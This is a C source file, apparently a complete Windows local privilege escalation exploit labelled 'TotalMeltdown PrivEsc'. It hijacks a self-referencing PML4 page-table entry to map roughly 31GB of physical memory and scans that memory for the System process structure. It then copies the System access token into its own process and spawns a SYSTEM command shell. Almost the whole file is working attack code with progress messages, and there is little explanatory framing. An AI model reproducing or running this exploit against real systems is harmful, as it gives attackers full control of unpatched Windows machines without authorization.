#include "stdafx.h" #define PML4_BASE 0xFFFFF6FB7DBED000 #define PDP_BASE 0xFFFFF6FB7DA00000 #define PD_BASE 0xFFFFF6FB40000000 #define PT_BASE 0xFFFFF68000000000 typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; #pragma pack(push,4) typedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR { UCHAR Type; UCHAR ShareDisposition; USHORT Flags; union { struct { PHYSICAL_ADDRESS Start; ULONG Length; } Generic; struct { PHYSICAL_ADDRESS Start; ULONG Length; } Port; struct { #if defined(NT_PROCESSOR_GROUPS) USHORT Level; USHORT Group; #else ULONG Level; #endif ULONG Vector; KAFFINITY Affinity; } Interrupt; struct { union { struct { #if defined(NT_PROCESSOR_GROUPS) USHORT Group; #else USHORT Reserved; #endif USHORT MessageCount; ULONG Vector; KAFFINITY Affinity; } Raw; struct { #if defined(NT_PROCESSOR_GROUPS) USHORT Level; USHORT Group; #else ULONG Level; #endif ULONG Vector; KAFFINITY Affinity; } Translated; } DUMMYUNIONNAME; } MessageInterrupt; struct { PHYSICAL_ADDRESS Start; ULONG Length; } Memory; struct { ULONG Channel; ULONG Port; ULONG Reserved1; } Dma; struct { ULONG Channel; ULONG RequestLine; UCHAR TransferWidth; UCHAR Reserved1; UCHAR Reserved2; UCHAR Reserved3; } DmaV3; struct { ULONG Data[3]; } DevicePrivate; struct { ULONG Start; ULONG Length; ULONG Reserved; } BusNumber; struct { ULONG DataSize; ULONG Reserved1; ULONG Reserved2; } DeviceSpecificData; struct { PHYSICAL_ADDRESS Start; ULONG Length40; } Memory40; struct { PHYSICAL_ADDRESS Start; ULONG Length48; } Memory48; struct { PHYSICAL_ADDRESS Start; ULONG Length64; } Memory64; struct { UCHAR Class; UCHAR Type; UCHAR Reserved1; UCHAR Reserved2; ULONG IdLowPart; ULONG IdHighPart; } Connection; } u; } CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR; #pragma pack(pop,4) typedef enum _INTERFACE_TYPE { InterfaceTypeUndefined, Internal, Isa, Eisa, MicroChannel, TurboChannel, PCIBus, VMEBus, NuBus, PCMCIABus, CBus, MPIBus, MPSABus, ProcessorInternal, InternalPowerBus, PNPISABus, PNPBus, Vmcs, ACPIBus, MaximumInterfaceType } INTERFACE_TYPE, *PINTERFACE_TYPE; typedef struct _CM_PARTIAL_RESOURCE_LIST { USHORT Version; USHORT Revision; ULONG Count; CM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1]; } CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST; typedef struct _CM_FULL_RESOURCE_DESCRIPTOR { INTERFACE_TYPE InterfaceType; ULONG BusNumber; CM_PARTIAL_RESOURCE_LIST PartialResourceList; } *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR; typedef struct _CM_RESOURCE_LIST { ULONG Count; CM_FULL_RESOURCE_DESCRIPTOR List[1]; } *PCM_RESOURCE_LIST, CM_RESOURCE_LIST; struct memory_region { ULONG64 size; ULONG64 address; }; // Very hack'y way of trying to map out physical memory regions to try and reduce // risk of BSOD DWORD parse_memory_map(struct memory_region *regions) { HKEY hKey = NULL; LPTSTR pszSubKey = L"Hardware\\ResourceMap\\System Resources\\Physical Memory"; LPTSTR pszValueName = L".Translated"; LPBYTE lpData = NULL; DWORD dwLength = 0, count = 0, type = 0;; if (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS) { printf("[*] Could not get reg key\n"); return 0; } if (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS) { printf("[*] Could not query hardware key\n"); return 0; } lpData = (LPBYTE)malloc(dwLength); RegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength); CM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData; for (int i = 0; i < resource_list->Count; i++) { for (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) { if (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) { regions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart; regions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length; regions++; count++; } } } return count; } int main() { printf("TotalMeltdown PrivEsc exploit by @_xpn_\n"); printf(" paging code by @UlfFrisk\n\n"); unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD; DWORD done; DWORD count; // Parse registry for physical memory regions printf("[*] Getting physical memory regions from registry\n"); struct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10); count = parse_memory_map(regions); if (count == 0) { printf("[X] Could not find physical memory region, quitting\n"); return 2; } for (int i = 0; i < count; i++) { printf("[*] Phyiscal memory region found: %p - %p\n", regions[i].address, regions[i].address + regions[i].size); } // Check for vulnerability __try { int test = *(unsigned long long *)PML4_BASE; } __except (EXCEPTION_EXECUTE_HANDLER) { printf("[X] Could not access PML4 address, system likely not vulnerable\n"); return 2; } // setup: PDPT @ fixed hi-jacked physical address: 0x10000 // This code uses the PML4 Self-Reference technique discussed, and iterates until we find a "free" PML4 entry // we can hijack. for (iPML4 = 256; iPML4 < 512; iPML4++) { vaPML4e = PML4_BASE + (iPML4 << 3); if (*(unsigned long long *)vaPML4e) { continue; } // When we find an entry, we add a pointer to the next table (PDPT), which will be // stored at the physical address 0x10000 *(unsigned long long *)vaPML4e = 0x10067; break; } printf("[*] PML4 Entry Added At Index: %d\n", iPML4); // Here, the PDPT table is referenced via a virtual address. // For example, if we added our hijacked PML4 entry at index 256, this virtual address // would be 0xFFFFF6FB7DA00000 + 0x100000 // This allows us to reference the physical address 0x10000 as: // PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100 vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3)); printf("[*] PDPT Virtual Address: %p", vaPDPT); // 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages // Below is responsible for adding 31 entries to the PDPT for (iPDPT = 0; iPDPT < 31; iPDPT++) { *(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12); } // For each of the PDs, a further 512 PT's are created. This gives access to // 512 * 32 * 2mb = 33gb physical memory space for (iPDPT = 0; iPDPT < 31; iPDPT++) { if ((iPDPT % 3) == 0) printf("\n[*] PD Virtual Addresses: "); vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3)); printf("%p ", vaPD); for (iPD = 0; iPD < 512; iPD++) { // Below, notice the 0xe7 flags added to each entry. // This is used to create a 2mb page rather than the standard 4096 byte page. *(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7; } } printf("\n[*] Page tables created, we now have access to ~31gb of physical memory\n"); #define EPROCESS_IMAGENAME_OFFSET 0x2e0 #define EPROCESS_TOKEN_OFFSET 0x208 #define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base unsigned long long ourEPROCESS = 0, systemEPROCESS = 0; unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3)); STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); printf("[*] Hunting for _EPROCESS structures in memory\n"); for (int j = 0; j < count; j++) { printf("[*] Trying physical region %p - %p\n", regions[j].address, regions[j].address + regions[j].size); for (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) { __try { // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field if (ourEPROCESS == 0 && memcmp("TotalMeltdownP", (unsigned char *)(exploitVM + i), 14) == 0) { if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) { ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET; printf("[*] Found our _EPROCESS at %p\n", ourEPROCESS); } } // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field else if (systemEPROCESS == 0 && memcmp("System\0\0\0\0\0\0\0\0\0", (unsigned char *)(exploitVM + i), 14) == 0) { if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) { systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET; printf("[*] Found System _EPROCESS at %p\n", systemEPROCESS); } } if (systemEPROCESS != 0 && ourEPROCESS != 0) { // Swap the tokens by copying the pointer to System Token field over our process token printf("[*] Copying access token from %p to %p\n", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET); *(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET); printf("[*] Done, spawning SYSTEM shell...\n\n"); CreateProcessA(0, "cmd.exe", NULL, NULL, TRUE, 0, NULL, "C:\\windows\\system32", &si, &pi); break; } } __except (EXCEPTION_EXECUTE_HANDLER) { printf("[X] Exception occured, stopping to avoid BSOD\n"); return 2; } } } return 0; }